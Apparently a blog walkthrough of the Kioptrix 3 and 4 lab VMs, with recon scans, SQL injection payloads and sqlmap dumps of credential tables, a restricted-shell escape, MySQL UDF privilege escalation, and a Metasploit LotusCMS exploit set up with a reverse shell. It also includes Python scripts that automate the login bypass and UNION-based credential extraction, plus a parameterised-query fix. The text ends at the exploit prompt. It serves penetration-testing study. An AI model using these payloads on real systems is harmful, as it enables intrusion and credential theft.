— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine: 192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.154

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!

root@kali:~# nmap -sS -n  192.168.182.154

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT
Nmap scan report for 192.168.182.154
Host is up (0.00034s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:68:B2:1F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds
root@kali:~#  

Since ports 139/tcp and 445/tcp are open, let's enumerate SMB with enum4linux to check whether any shares are open and to collect usernames. enum4linux produced a lot of output, but I only show the useful info below.

root@kali:~# enum4linux 192.168.182.154
 ========================================= 
|    OS information on 192.168.182.154    |
 ========================================= 
[+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.182.154 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ================================ 
|    Users on 192.168.182.154    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
 ============================================ 
|    Share Enumeration on 192.168.182.154    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.182.154
//192.168.182.154/print$	Mapping: DENIED, Listing: N/A
//192.168.182.154/IPC$	[E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

So the victim is running Samba 3.0.28a (I found no usable public exploit for this version), and the enumeration gave us 5 usernames: nobody, robert, root, john and loneferret. The tool also tried to map the print$ and IPC$ shares, but anonymous access was denied. Lets try dirb against the victim's website next.

root@kali:~# dirb http://192.168.182.154

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Mar 12 21:29:00 2017
URL_BASE: http://192.168.182.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.182.154/ ----
+ http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330)                                                                                                                                    
==> DIRECTORY: http://192.168.182.154/images/                                                                                                                                            
+ http://192.168.182.154/index (CODE:200|SIZE:1255)                                                                                                                                      
+ http://192.168.182.154/index.php (CODE:200|SIZE:1255)                                                                                                                                  
==> DIRECTORY: http://192.168.182.154/john/                                                                                                                                              
+ http://192.168.182.154/logout (CODE:302|SIZE:0)                                                                                                                                        
+ http://192.168.182.154/member (CODE:302|SIZE:220)                                                                                                                                      
+ http://192.168.182.154/server-status (CODE:403|SIZE:335)                                                                                                                               
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Mar 12 21:29:03 2017
DOWNLOADED: 4612 - FOUND: 6
root@kali:~# 

Found some useful stuff, including a listable /john/ directory, which matches one of the usernames from the SMB enumeration.

Checking the website, it has a login form. Lets see if it's vulnerable to SQL injection by putting a single quote (') in the username and password fields.

Well look what we have here! It is vulnerable to SQLi!!

Exploitation

I will use 2 methods to get 2 sets of login credentials for the server: first a manual SQL injection, then sqlmap. Both yield the same results; I am showing both so nobody gets confused. Lets get started!

Manual SQLi

Lets try an injection using one of the usernames from the SMB enumeration. I'm starting with john, because dirb also found a /john/ directory. I enter john in the username field and 1' or '1'='1 in the password field. The back-end query then looks something like this:

SELECT * FROM users where username='john' and password='1' or '1'='1' 

Because AND binds tighter than OR, the WHERE clause is evaluated as (username='john' and password='1') or '1'='1'. The second half is always true, so the query matches every row in the table and the login check passes without a valid password.

It worked!! The application showed me john's record, with the password being MyNameIsJohn

Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==
Note-You can skip to Escaping restricted shell to continue the pentest or go to SQLi using sqlmap to learn another method on how I got the credentials to the server.
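The following is an added example, not code from the original write-up or from the Kioptrix VM. It reproduces the login bypass above in Python with an in-memory SQLite database: a login function that concatenates the form fields into SQL (the way the vulnerable checklogin.php evidently does), the single-quote probe used to detect the bug, and the parameterised version that closes it. The table and column names (users, username, password) are assumptions; the real PHP source is not reproduced on the page.

```python
import sqlite3

# Constructed stand-in for the login page: a "users" table holding the two
# accounts from the write-up. The query template mirrors what a PHP login
# script does when it pastes form fields straight into the SQL text.
USERS = [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users (username, password) VALUES (?, ?)", USERS)
    return con


def build_vulnerable_query(username, password):
    # The bug: a quote in the input ends the string literal and everything
    # after it is parsed as SQL.
    return ("SELECT username, password FROM users "
            "WHERE username='%s' AND password='%s'" % (username, password))


def vulnerable_login(con, username, password):
    # Returns every row the concatenated query matches. A real login script
    # takes the first row and treats a non-empty result as "logged in".
    return con.execute(build_vulnerable_query(username, password)).fetchall()


def single_quote_probe(con):
    # The detection step: a lone quote in the username field breaks the
    # query's syntax, and the resulting database error is the tell.
    try:
        vulnerable_login(con, "'", "x")
    except sqlite3.OperationalError:
        return True
    return False


def safe_login(con, username, password):
    # The fix: a parameterised query. The driver sends the values separately
    # from the SQL text, so quotes in the input stay data.
    row = con.execute(
        "SELECT username, password FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return [row] if row else []


if __name__ == "__main__":
    db = make_db()
    print(build_vulnerable_query("john", "1' or '1'='1"))
    print(vulnerable_login(db, "john", "1' or '1'='1"))   # every user, passwords included
    print(safe_login(db, "john", "1' or '1'='1"))         # []
```

The vulnerable path returns both users for the 1' or '1'='1 payload, which is exactly why a login page that echoes the matched record leaks passwords; the parameterised path returns nothing for the same input.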

SQLi using sqlmap

The error from the login form, together with the form's HTML source, gives me enough to run sqlmap: the form POSTs to checklogin.php with the fields myusername and mypassword, which is where the --data values in the commands below come from.

The command below lists the databases on the server.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --dbs

We have 3 databases. Lets see what the members database holds by listing its tables with the command below. (A note on the options: --level=5 --risk=3 turns on sqlmap's full set of tests, including OR-based boolean payloads. Those can modify data if the injection point sits inside an UPDATE or DELETE statement, so use them with care on anything that is not a lab box.)

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --tables -D members

So the only table in the members database is also called members. Lets dump it with the command below and see what we get.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password"  -D members -T members --dump

BINGO!! We got the same 2 sets of valid credentials, which I will use to ssh into the server.

Escaping restricted shell

root@kali:~# ssh john@192.168.182.154
john@192.168.182.154's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 

As I log in, I notice I have a restricted shell that only allows a handful of commands. The os.system() syntax below is Python, not sh: the restricted shell evidently evaluates its input as Python code, so the allowed echo command becomes a way out. I can "escape" the limited shell with echo os.system('/bin/bash'):

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ 

Privilege Escalation

Once out of limited shell, I ran several commands to see if I could find anything interesting.

john@Kioptrix4:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
john@Kioptrix4:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
john@Kioptrix4:~$ ps -ef | grep root
root         1     0  0 Mar12 ?        00:00:01 /sbin/init
root         2     0  0 Mar12 ?        00:00:00 [kthreadd]
root         3     2  0 Mar12 ?        00:00:00 [migration/0]
root         4     2  0 Mar12 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Mar12 ?        00:00:00 [watchdog/0]
root         6     2  0 Mar12 ?        00:00:00 [events/0]
root         7     2  0 Mar12 ?        00:00:00 [khelper]
root        41     2  0 Mar12 ?        00:00:00 [kblockd/0]
root        44     2  0 Mar12 ?        00:00:00 [kacpid]
root        45     2  0 Mar12 ?        00:00:00 [kacpi_notify]
root       170     2  0 Mar12 ?        00:00:00 [kseriod]
root       208     2  0 Mar12 ?        00:00:00 [pdflush]
root       209     2  0 Mar12 ?        00:00:00 [pdflush]
root       210     2  0 Mar12 ?        00:00:00 [kswapd0]
root       252     2  0 Mar12 ?        00:00:00 [aio/0]
root      1468     2  0 Mar12 ?        00:00:00 [ata/0]
root      1471     2  0 Mar12 ?        00:00:00 [ata_aux]
root      1480     2  0 Mar12 ?        00:00:00 [scsi_eh_0]
root      1485     2  0 Mar12 ?        00:00:00 [scsi_eh_1]
root      1498     2  0 Mar12 ?        00:00:00 [ksuspend_usbd]
root      1503     2  0 Mar12 ?        00:00:00 [khubd]
root      2359     2  0 Mar12 ?        00:00:00 [scsi_eh_2]
root      2602     2  0 Mar12 ?        00:00:00 [kjournald]
root      2769     1  0 Mar12 ?        00:00:00 /sbin/udevd --daemon
root      3042     2  0 Mar12 ?        00:00:00 [kgameportd]
root      3212     2  0 Mar12 ?        00:00:00 [kpsmoused]
root      4501     1  0 Mar12 tty4     00:00:00 /sbin/getty 38400 tty4
root      4502     1  0 Mar12 tty5     00:00:00 /sbin/getty 38400 tty5
root      4507     1  0 Mar12 tty2     00:00:00 /sbin/getty 38400 tty2
root      4509     1  0 Mar12 tty3     00:00:00 /sbin/getty 38400 tty3
root      4518     1  0 Mar12 tty6     00:00:00 /sbin/getty 38400 tty6
root      4569     1  0 Mar12 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4690  4646  0 Mar12 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4763     1  0 Mar12 ?        00:00:00 /usr/sbin/nmbd -D
root      4765     1  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4779  4765  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4780     1  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4800  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4812     1  0 Mar12 ?        00:00:00 /usr/sbin/cron
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
root      4890     1  0 Mar12 tty1     00:00:00 /sbin/getty 38400 tty1
root      4943  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4944  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      5752  4590  0 01:07 ?        00:00:00 sshd: john [priv]
john      5901  5807  0 02:26 pts/0    00:00:00 grep root
john@Kioptrix4:~$ 

I can see that mysqld is running as root (note the --user=root flag in the ps output). Since I have a shell on the machine, lets look for the database credentials in the web application's configuration files.

john@Kioptrix4:~$ ls /var/www/
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:~$ 

Reading the PHP sources in /var/www/ showed that the application connects to MySQL as root with no password. Since we can log in to MySQL as root, and mysqld itself runs as the OS root user, we can escalate to root with a User Defined Function (UDF): MySQL can load a shared library and expose its functions in SQL, and lib_mysqludf_sys provides sys_exec(), which runs a shell command as whatever user mysqld runs as, here root. For this to work the library has to be present on the server. Using whereis I found it was already installed:

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$ 

Lets connect to the MySQL server. These two tutorials helped me understand MySQL UDFs: MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux, and Command execution with a MySQL UDF. Note that sys_exec was already registered on this box, since the SELECT below works without a CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so' first; on a fresh target you would have to create the function yourself, which the MySQL root user can do.

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# hostname
Kioptrix4
root@Kioptrix4:/home/john# 

Using sys_exec I ran usermod, which added john to the admin group. On Ubuntu 8.04 the default sudoers grants %admin ALL=(ALL) ALL, so sudo su with john's own password then gave me a root shell. The root cause here is not the UDF library itself but MySQL running as the OS root user with a passwordless root account: the same sys_exec call under a dedicated mysql user would only get you that user.

Conclusion

This was tougher than the previous level, but when it got tough I used the university of google for some additional help. Several exploitation paths got me access to the server, and then MySQL did the privilege escalation to the desired root shell. If you have any questions or enjoyed the read, leave some feedback below! That's it for this level. Now on to the last one!

Part 3 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification. The link to download the VM can be found here. Lets get started!!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting in the way of these things, you know.

After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still in the realm of the beginner, I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to one's own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to do this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.153

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

An nmap scan shows OpenSSH 4.7p1 Debian 8ubuntu1.2 on port 22/tcp and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) on port 80/tcp, and fingerprints the OS as Linux 2.6.X. With only SSH and a web server exposed, it's a safe guess that we will be doing web exploitation.

root@kali:~# nmap -A -T4 192.168.182.153

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST
Nmap scan report for kioptrix3.com (192.168.182.153)
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:58:63:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms kioptrix3.com (192.168.182.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@kali:~# 

Running Nikto, I could see that the web server hosts phpMyAdmin, a free PHP tool for administering MySQL over the web (I smell a SQL injection later in the pentest).

root@kali:~# nikto -host http://192.168.182.153/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.153
+ Target Hostname:    192.168.182.153
+ Target Port:        80
+ Start Time:         2017-03-02 00:24:51 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 14:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-03-02 00:25:05 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 
 

I first browsed the site and found it was a blog. I already knew it had phpMyAdmin from the nikto scan, but I also found a gallery.

Browsing further, under “Ligoat Press Room” the sorting options (photo id) lead to a URL with an id parameter, which is a classic place to look for SQL injection. Appending ' after php?id=1 made the server return a SQL error. This site is vulnerable to SQL injection!!

Lastly, I checked the login portal on the blog and found it runs LotusCMS, which is affected by the LotusCMS 3.0 eval() Remote Command Execution exploit.

Exploitation

The exploitation is split into 3 parts. The first is a SQL injection with sqlmap, the second a manual SQL injection, and the last the LotusCMS 3.0 eval() Remote Command Execution exploit. All 3 produce the same result: user credentials for the vulnerable VM, which will then be used to escalate privileges to root.

SQLi using sqlmap

I will NOT be putting all the output from sqlmap here; I did not want to dump that much, so I only show the commands used and the important output. Just FYI! Knowing the web server is vulnerable to SQL injection, I fired up sqlmap and ran the command below to enumerate the databases.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

Well 3 databases were available! I used the next command to see the tables on the gallery database.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

Now we see 7 tables in the gallery database. dev_accounts looks very interesting, so lets dump its contents with the command below and see what we find.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

The dump gives us the usernames and password hashes for dreg and loneferret. We can ssh into the victim's machine with these accounts once we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” unless you want to see the other methods I used to get the passwords.)

Manual SQLi

Now the same SQL injection done manually instead of with sqlmap. I used a tutorial that helped me a lot and that I recommend to you all: Hacking website using SQL Injection -step by step guide. If you have questions about how and why I used a certain SQL statement, go to that tutorial, which explains it in more detail, or just leave me a comment.
With that covered, lets get started! We know from earlier that the site is vulnerable to SQL injection; what I want to know next is how many columns the original query selects and which of them are reflected in the page. I use the payload below to find out. NOTE: Put this after the id parameter in the URL. (MySQL's -- comment needs a whitespace character after it, so if a bare -- does not work in the URL, use --+ or -- - instead.)

-1  union select 1,2,3,4,5,6--

The page renders without an error at 6 placeholders, so the original query selects 6 columns (a UNION only works when both SELECTs have the same number of columns, so you step the count up until the error goes away). The values 2 and 3 show up in the page, so columns 2 and 3 are the ones we can read data through (the tutorial linked above covers this in more detail). Next, I find the version of the database. Since column 2 is reflected, that is where the injected expression goes:

-1  union select 1,version(),3,4,5,6--

5.0.51a is a MySQL version, so we now know which dialect the database speaks, and that information_schema is available (it exists from MySQL 5.0 on). Next we need the names of the tables in the current database, using the query below.

-1  union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--


Table names:

Sweet! We have all the tables in the database, so lets check out dev_accounts, which looks the most interesting. I inject the query below. Note: CHAR(100, 101, ...) spells out dev_accounts as ASCII codes, which avoids putting a quoted string into the payload (handy when the application escapes quotes, for example with magic_quotes). I used the Hackbar extension to do the conversion.

-1  union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

Almost done! Lets get the database to give us the usernames and passwords with the query below (0x3a is a colon, used as the separator between username and password):

-1  union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--

Bingo!! We got username and password hashes to dreg and loneferret. Now onto password cracking. (You can skip the next exploit if you want to continue on in the pentest or check out the Lotus exploit to see another way of exploiting this VM)
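The following is an added example, not code from the write-up or from the Kioptrix VM. It automates the manual UNION-based steps above (find the column count, find which columns are reflected, then pull data through a reflected column) against a constructed stand-in for gallery.php?id=. The simulation uses Python's built-in sqlite3 instead of MySQL, so the metadata queries differ (sqlite_master in place of information_schema, || in place of concat()); the comments give the MySQL forms used on the page. The photo table, its six column names, and the dev_accounts contents are all invented for the example.

```python
import re
import sqlite3

# Constructed stand-in for gallery.php?id=N. The photo table has 6 columns,
# like the gallery query in the write-up, and only two of them (title and
# description, i.e. columns 2 and 3) are rendered into the page. dev_accounts
# holds invented username/hash pairs; the real hashes are not used here.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE photos (id INTEGER, title TEXT, descr TEXT, "
                "owner TEXT, views INTEGER, tags TEXT)")
    con.execute("INSERT INTO photos VALUES (1, 'Goat', 'A photo of a goat', 'admin', 3, 'farm')")
    con.execute("CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO dev_accounts VALUES (?, ?, ?)",
                    [(1, "alice", "0" * 32), (2, "bob", "f" * 32)])
    return con


def render_page(con, id_param):
    """The vulnerable page: the id parameter is pasted straight into the SQL."""
    sql = "SELECT id, title, descr, owner, views, tags FROM photos WHERE id=" + id_param
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.OperationalError as exc:
        return "SQL error: %s" % exc          # the error seen after appending '
    if row is None:
        return "<h1>no such photo</h1>"
    return "<h1>%s</h1><p>%s</p>" % (row[1], row[2])


def union_payload(columns, source=None):
    # id=-1 matches no real row, so the UNION'd row is what the page renders.
    # SQLite accepts a bare "--"; MySQL needs whitespace after it ("--+" in a URL).
    sql = "-1 union select " + ",".join(columns)
    if source:
        sql += " from " + source
    return sql + "--"


def find_column_count(page, max_cols=20):
    """Step the column count up until the UNION stops erroring (the 1,2,3,4,5,6 step)."""
    for n in range(1, max_cols + 1):
        if "SQL error" not in page(union_payload([str(i) for i in range(1, n + 1)])):
            return n
    return None


def find_reflected_columns(page, ncols):
    """Which placeholders appear in the HTML, i.e. which columns we can read through.
    Distinct markers are used instead of bare digits so page text cannot confuse us."""
    html = page(union_payload(["'mk%dmk'" % i for i in range(1, ncols + 1)]))
    return [i for i in range(1, ncols + 1) if "mk%dmk" % i in html]


def extract(page, ncols, col, expr, source=None):
    """Put expr into a reflected column, wrapped in markers so it can be cut out of the HTML."""
    cols = [str(i) for i in range(1, ncols + 1)]
    cols[col - 1] = "'@@'||(%s)||'@@'" % expr   # SQLite concat; MySQL: concat(0x4040,expr,0x4040)
    m = re.search(r"@@(.*?)@@", page(union_payload(cols, source)), re.S)
    return m.group(1) if m else None


def run_attack(con):
    page = lambda p: render_page(con, p)
    ncols = find_column_count(page)
    col = find_reflected_columns(page, ncols)[0]
    return {
        "columns": ncols,
        # MySQL: group_concat(table_name) from information_schema.tables where table_schema=database()
        "tables": extract(page, ncols, col, "group_concat(name)", "sqlite_master where type='table'"),
        # MySQL: group_concat(username,0x3a,password) from dev_accounts
        "creds": extract(page, ncols, col, "group_concat(username||':'||password)", "dev_accounts"),
    }


if __name__ == "__main__":
    print(run_attack(make_db()))
```

The column-count loop is the part worth automating: it is the same probe the author did by hand with 1,2,3,4,5,6, just repeated until the database stops complaining about mismatched SELECTs.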

LotusCMS 3.0 eval() Remote Command Execution Exploit

I will use a Metasploit module for the LotusCMS 3.0 eval() Remote Command Execution exploit to get a shell. The module defaults to URI /lcms/; on this box LotusCMS is installed at the web root, so I set URI to /.

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.182.153
RHOST => 192.168.182.153
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

